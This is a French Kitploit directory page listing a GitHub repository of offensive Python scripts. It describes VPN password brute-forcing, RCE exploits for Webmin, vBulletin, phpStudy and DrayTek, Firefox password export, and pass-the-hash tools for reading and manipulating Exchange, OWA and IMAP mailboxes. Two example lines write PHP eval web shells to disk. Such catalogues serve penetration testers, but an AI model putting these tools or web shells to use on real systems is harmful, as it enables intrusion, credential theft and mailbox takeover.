Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Homework-of-Python — Codes Python de mon blog. | Kitploit
Outils/GitHubGitHub/3gstudent/homework-of-python
Scanners de VulnérabilitésAttaques de Mots de PasseExploitationExploitation d'Applications WebCollecte d'InformationsPost-ExploitationRed TeamingDéveloppement de Charges Utiles
GitHub3gstudent/homework-of-python

Homework-of-Python

Codes Python de mon blog.

Voir le dépôt
41212618il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Homework-of-Python

Codes Python de mon blog.

pptp_password_hack.py

Utilise une attaque par force brute pour obtenir le mot de passe du VPN PPTP.

Il lit les mots de passe contenus dans le fichier (nommé wordlist) puis utilise pptpsetup pour se connecter au serveur.

L'intervalle de temps est de 10 secondes.


portscan.py

Permet de scanner les ports.

Le délai d'expiration (timeout) est de 3 secondes.

Version C++ :

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

Permet d'obtenir l'adresse IP à partir de l'URL.

Je peux utiliser directement le résultat de Sublist3r.

file_deduplication(For_urltoip).py

Permet de supprimer les adresses IP en double du résultat de Sublist3r.

Je peux utiliser directement le résultat de urltoip.py.

Les adresses IP peuvent être triées à l'aide de Sublime (F9).


file_deduplication.py

Permet de supprimer les éléments en double d'un fichier.

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

Référence :

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

Permet d'appeler l'API de fofa et d'afficher les adresses IP des résultats.

Vous pouvez obtenir 100 résultats.

fofa_api_VIP.py

Permet d'appeler l'API de fofa et d'afficher les adresses IP des résultats.

Si vous êtes VIP, vous obtiendrez 10 000 résultats.


vBulletin_5.x_0day_pre-auth_RCE.py

Référence :

https://seclists.org/fulldisclosure/2019/Sep/31

Ex. :

echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

Référence :

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

Ex. :

system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

Permet d'exporter les mots de passe de Firefox.

get_Exchange_version.py

Permet d'obtenir la version d'Exchange.

Obtenez d'abord le BuildNumber à partir du code source de l'URL, puis la version.

Référence :

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

Permet de scanner la vulnérabilité RCE SMBv3.

Le délai d'expiration (timeout) est de 3 secondes.


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

Référence :

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

Les appareils DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta et Vigor300B 1.3.3_Beta, 1.4.2.1_Beta et 1.4.4_Beta permettent l'exécution de code à distance en tant que root (sans authentification) via des métacaractères shell dans l'URI cgi-bin/mainfunction.cgi..

Produits concernés :

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

Utilise l'API SOAP de Zimbra pour se connecter au serveur de messagerie Zimbra.

Utilisation :

      Zimbra_SOAP_API.py <url> <username> <password> <mode>

mode :

  • low authentification pour un jeton de bas niveau
  • admin authentification pour un jeton administrateur
  • ssrf Utilisez CVE-2019-9621 pour obtenir le jeton administrateur

Ex. :

      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

Permet de vérifier la validité d'un compte Exchange Web Service (prend en charge le texte en clair et ntlmhash).

Référence : https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

Utilisation :

checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

Ex. :

checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

Permet d'accéder à Autodiscover.xml et d'obtenir la configuration de l'utilisateur (prend en charge le texte en clair et ntlmhash).

Utilisation :

checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

Ex. :

checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

checkAutodiscoverEx.py

Mode supplémentaire de checkAutodiscover.py

Ajoute un paramètre

ewsManage.py

Permet d'accéder à Exchange Web Service (prend en charge le texte en clair et ntlmhash).

Utilisation :

ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


Ex. :

ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

Permet de vérifier la validité des identifiants SSH (prend en charge le mot de passe et le fichier de clé privée).

Utilisation :

sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

Ex. :

sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd

Exécution de commandes à distance via SSH (prend en charge le mot de passe et le fichier de clé privée).

Utilisation :

sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

Ex. :

sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

Permet de vérifier la validité des identifiants de eas (Exchange Server ActiveSync).

Utilisation :

easCheck.py <host> <user> <password>

Ex. :

easCheck.py 192.168.1.1 user1 password1

checkOWA.py

Permet de vérifier la validité d'un compte Exchange en se connectant à OWA.

Utilisation :

checkOWA.py <url> <user> <password>

owaManage.py

Permet de lire les e-mails en se connectant à OWA.

Utilisation :

owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

Utilise IMAP pour se connecter au serveur de messagerie.

Utilisation :

imapManage.py <IMAP server> <username> <password> <command>    
<command>:
CheckConfig             get the folder name
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

Permet d'implémenter l'authentification NTLM et de communiquer avec execCmd.aspx.

Les données de communication sont encodées en Base64.

Utilisation :

aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

Télécharger l’outil